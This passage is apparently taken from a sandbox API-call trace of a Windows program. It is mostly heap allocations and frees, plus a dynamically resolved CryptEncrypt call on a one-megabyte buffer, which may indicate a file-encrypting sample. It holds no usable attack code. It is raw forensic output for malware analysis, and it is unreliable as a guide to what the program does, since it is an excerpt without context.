| out: hHeap=0x970000) returned 1 [0207.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0207.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0207.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0207.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0207.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0207.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0207.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0207.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0207.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0207.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0207.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0207.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0207.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0207.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0207.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0207.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0207.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0207.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0207.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0207.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0207.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0207.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0207.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0207.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0207.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0207.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0207.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0207.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0207.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0207.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x118e020 [0207.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0207.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x118e020 | out: hHeap=0x970000) returned 1 [0207.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0207.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0207.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0207.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0207.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0207.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0207.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0207.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0207.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0207.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0207.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0207.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0207.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0207.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0207.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0207.366] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0207.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0207.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0207.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0207.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0207.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0207.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0207.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0207.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0207.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0207.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0207.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0207.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0207.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0207.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0207.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0207.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0207.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0207.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0207.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0207.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0207.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0207.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0207.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0207.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0207.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0207.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0207.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0207.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0207.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0207.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0207.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0207.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0207.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0207.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0207.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0207.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0207.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0207.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0207.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0207.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0207.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0207.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0207.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0207.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0207.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0207.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0207.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0207.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0207.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0207.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0207.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0207.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0207.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0207.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0207.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0207.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0207.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0207.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50c98, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0207.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0207.370] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0207.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0207.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0207.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0207.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0207.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0207.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0207.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0207.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0207.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0207.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0207.371] CryptEncrypt (in: hKey=0xa87050, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x100000, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x100000) returned 1 [0207.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0207.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0207.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0207.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0207.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0207.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0207.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0207.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0207.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0207.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0207.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0207.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0207.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0207.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0207.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0207.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0207.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0207.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0207.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0207.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0207.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0207.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0207.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0207.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0207.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0207.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0207.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0207.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0207.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0207.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0207.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0207.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0207.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0207.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0207.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0207.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0207.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0207.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0207.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0207.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0207.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0207.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0207.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0207.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0207.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0207.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0207.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0207.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0207.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0207.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0207.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0207.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0207.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0207.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0207.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0207.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0207.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0207.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0207.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0207.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0207.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0207.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0207.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0207.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0207.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0207.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0207.375] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0207.375] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0207.375] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0207.375] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0207.375] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0207.375] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0207.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0207.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0207.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0207.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0207.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0207.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0207.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0207.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0207.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0207.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0207.376] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0207.376] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0207.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0207.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0207.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0207.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0207.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0207.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0207.376] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0207.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0207.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0207.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0207.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0207.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0207.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0207.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0207.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0207.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0207.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0207.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0207.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0207.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0207.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0207.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0207.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0207.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0207.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0207.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0207.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0207.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0207.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0207.377] 